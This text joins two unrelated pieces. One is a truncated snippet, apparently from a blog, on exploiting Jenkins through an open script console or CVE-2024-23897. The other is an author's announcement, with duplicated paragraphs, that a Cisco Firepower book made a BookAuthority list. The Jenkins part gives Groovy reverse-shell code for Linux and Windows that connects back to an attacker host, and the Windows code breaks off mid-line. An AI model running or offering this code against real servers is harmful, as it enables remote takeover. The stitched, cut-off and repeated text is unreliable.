Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
Cisco Firepower Threat Defense NGFW made it to the Best New Firewall Books 2019
I'm happy to announce that my book, "Cisco Firepower Threat Defense(FTD)
NGFW: An Administrator's Handbook : A 100% practical guide on
configuring and managing CiscoFTD using Cisco FMC and FDM.", made it to BookAuthority's Best New Firewall Books:
https://bookauthority.org/books/new-firewall-books?t=bku9fw&s=award&book=1726830187
BookAuthority collects and ranks the best books in the world, and it is a great honor to get this kind of recognition. Thank you for all your support!
The book is available for purchase on Amazon.
https://bookauthority.org/books/new-firewall-books?t=bku9fw&s=award&book=1726830187
BookAuthority collects and ranks the best books in the world, and it is a great honor to get this kind of recognition. Thank you for all your support!
The book is available for purchase on Amazon.